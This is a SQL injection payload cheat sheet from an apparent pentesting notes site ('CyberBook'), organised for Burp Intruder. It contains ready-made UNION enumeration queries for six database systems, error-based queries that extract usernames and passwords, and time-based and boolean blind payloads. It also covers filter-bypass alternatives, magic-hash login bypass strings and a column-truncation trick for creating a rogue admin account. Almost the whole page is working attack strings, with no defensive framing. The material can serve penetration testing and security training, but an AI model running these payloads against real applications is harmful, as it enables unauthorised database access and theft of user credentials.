📖 CyberBook

Appearance

SQLi - Intruder Payloads

📚 Resources

🔍 Recon

DBMS Identification

Keywords Based list

DBMSSQL Payload
MySQLconv('a',16,2)=conv('a',16,2)
SQLITElast_insert_rowid()>1
MSSQLBINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)
ORACLERAWTOHEX('AB')=RAWTOHEX('AB')
POSTGRESQLpg_client_encoding()=pg_client_encoding()
MSACCESSval(cvar(1))=1

SQL QUERY To Dicovery

Discovery version

php
# - MySQL: ' UNION SELECT @@version, NULL -- -
# - MSSQL: ' UNION SELECT @@version, NULL -- -
# - DB2: ' UNION SELECT versionnumber, NULL FROM sysibm.sysversions -- -
# - Oracle: ' UNION SELECT banner, NULL FROM v$version WHERE rownum = 1 -- -
# - PostgreSQL: ' UNION SELECT version(), NULL -- -
# - SQLite: ' UNION SELECT sqlite_version(), NULL -- -

List Databases

php
# - MySQL: ' UNION SELECT schema_name, NULL FROM information_schema.schemata -- -
# - MSSQL: ' UNION SELECT name, NULL FROM sys.databases -- -
# - Oracle: ' UNION SELECT username, NULL FROM all_users -- -
# - PostgreSQL: ' UNION SELECT datname, NULL FROM pg_database -- -
# - DB2: ' UNION SELECT schemaname,2,3,4 FROM syscat.schemata -- -
# - SQLite: ' UNION SELECT name,2,3,4 FROM pragma_database_list -- -

List Available Tables

php
# - MySQL: ' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema = DATABASE() -- -
# - MSSQL: ' UNION SELECT table_name, NULL FROM information_schema.tables -- -
# - DB2: ' UNION SELECT name, NULL FROM sysibm.systables WHERE creator = CURRENT USER -- -
# - Oracle: ' UNION SELECT table_name, NULL FROM all_tables WHERE rownum <= 10 -- -
# - PostgreSQL: ' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema = 'public' -- -
# - SQLite: ' UNION SELECT name, NULL FROM sqlite_master WHERE type='table' -- -

List the columns of a specific table

php
# - MySQL: ' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'users' -- -
# - MSSQL: ' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'users' -- -
# - DB2: ' UNION SELECT colname, NULL FROM syscat.columns WHERE tabname = 'USERS' -- -
# - Oracle: ' UNION SELECT column_name, NULL FROM all_tab_columns WHERE table_name = 'USERS' -- -
# - PostgreSQL: ' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name = 'users' -- -
# - SQLite: ' UNION SELECT sql, NULL FROM sqlite_master WHERE name = 'users' AND type = 'table' -- -

Comments

TypeDescriptionDBMS
--SQL CommentMySQL, MSSQL, SQLite, Oracle, PostgreSQL
#Hash commentMySQL
/**/C-style commentMySQL, MSSQL, SQLite, Oracle, PostgreSQL
`BacktickMySQL
;%00Null ByteMySQL, MSSQL

🚪 Post exploit

MD5 - SHA1

HashInputOutput (Raw)Payload
md5ffifdyop'or'6�]��!r,��b'or'
sha15651578060603509E&�ɶ��'||'8�vjc\�'||'8
sha1178374�ÜÛ¾}_i��a!8Wm'/*´Õ'/*
sha1277c7cVF�I\:X+(�R?�'5r�%'

Code to search for string: '/* in md5 binary hash:

This resource is a PHP code to search special caractere to escape SQL string

Error Based

Based on output to identify DBMS

sql
-- Create your error

-- Get db
,cast((chr(95)||current_database()) as numeric)

-- Get table
,cast(( SELECT table_name FROM information_schema.tables WHERE table_catalog=current_database() LIMIT 1 OFFSET 1 ) as numeric)

-- Get columns
,(cast(( SELECT column_name FROM information_schema.columns WHERE table_name=chr(109)||chr(51)||chr(109)||chr(98)||chr(114)||chr(51)||chr(53)||chr(116)||chr(52)||chr(98)||chr(108)||chr(51) LIMIT 1 OFFSET 0 ) as int))

-- extract rows from one column
,(cast(( SELECT id||chr(32)||us3rn4m3_c0l||chr(32)||p455w0rd_c0l||chr(32)||em41l_c0l FROM m3mbr35t4bl3  LIMIT 1 OFFSET 0) as int))

🔍 SQLi - Blind Injection (Intruder Payloads)

⌛ Time-Based

Guess data by measuring response time:

sql
-- Used SLEEP() and condition (used sqlmap)
' AND SLEEP(5)/*
' AND '1'='1' AND SLEEP(5)
' ; WAITFOR DELAY '00:00:05' --

✅ Time-Based Payloads with Conditions

sql
1 AND IF(ASCII(SUBSTRING(user,1,1))=97, SLEEP(5), 0)

-- MySQL CASE workaround
1 AND (SELECT CASE WHEN LENGTH(user)=5 THEN 1 ELSE 0 END) = 1

-- Using logical expressions
1 AND (SELECT 1 FROM dual WHERE 'a'='a') -- always true

-- PostgreSQL alternative
1 AND CASE WHEN (user LIKE 'a%') THEN pg_sleep(5) ELSE pg_sleep(0) END

🕵️‍♂️ Data Guessing Techniques

🎯 Get length

sql
1 AND LENGTH(user) = 5  -- No quotes needed
1 AND LENGTH((SELECT user FROM users WHERE id=1)) = 5

admin' and (select length(password)>7)-- -

🔤 Extract characters (Blind)

sql
-- Enumerate password
1 and (select substr(password,1,1)='a')--
---------------------------------------------------
1 && substring(password,1,1)='a'--
sql
1 AND ASCII(SUBSTRING(user,1,1)) = 97 -- 'a'
1 AND ASCII(SUBSTRING((SELECT user FROM users WHERE id=1),1,1)) = 97
1 AND ASCII(SUBSTRING(user FROM 1 FOR 1)) = 97      -- If comma is filtered
1 AND ORD(MID(user,1,1)) = 97                       -- Alternate function
1 AND (SELECT SUBSTRING(password,1,1)) = 'a'        -- Classic char guessing

🔁 Bypass Filters (keywords, characters)

🔒 Blocked Functions (e.g. SUBSTRING, MID, etc.)

sql
SUBSTRING()
SUBSTR()
MID()
LEFT()
RIGHT()

Use alternatives:

sql
-- Use LIKE
1 AND user LIKE "a%"               -- Starts with 'a'
1 AND user LIKE "admi%"           -- Starts with 'admi'

-- Use REGEXP
1 && user REGEXP "^a"            -- Starts with 'a'
1 AND user REGEXP "^admin$"       -- Exact match

🔒 Blocked Characters

FilteredAlternative
' (quote)Use numeric or ASCII logic
, (comma)Use FROM..FOR syntax: SUBSTRING(col FROM x FOR y)
UNIONUse EXISTS, subqueries
SLEEP, IFUse CASE, logical expressions

🔧 Union & Logic-Based Bypass

🔄 Union Bypass

sql
1 AND EXISTS(SELECT 1 FROM users WHERE user LIKE 'admin%')

-- Use subqueries
1 && (SELECT COUNT(*) FROM information_schema.tables) > 0

🧠 Logical Checks (Based on bool)

sql
1 AND 1=1          -- Always true
1 AND 1=2          -- Always false
1 && 'a'='a'      -- Works without numbers

Truncation

sql
-- You can bypass some SQL restrictions playing with the var size limits

CREATE TABLE users (username varchar(10), password varchar(20));
INSERT INTO users VALUES('admin','adminPassword');
INSERT INTO users VALUES('admin [whitespace] * 20 foo','h4ck3dBar');

--> 2 admins added
--> Possible to add your own admin account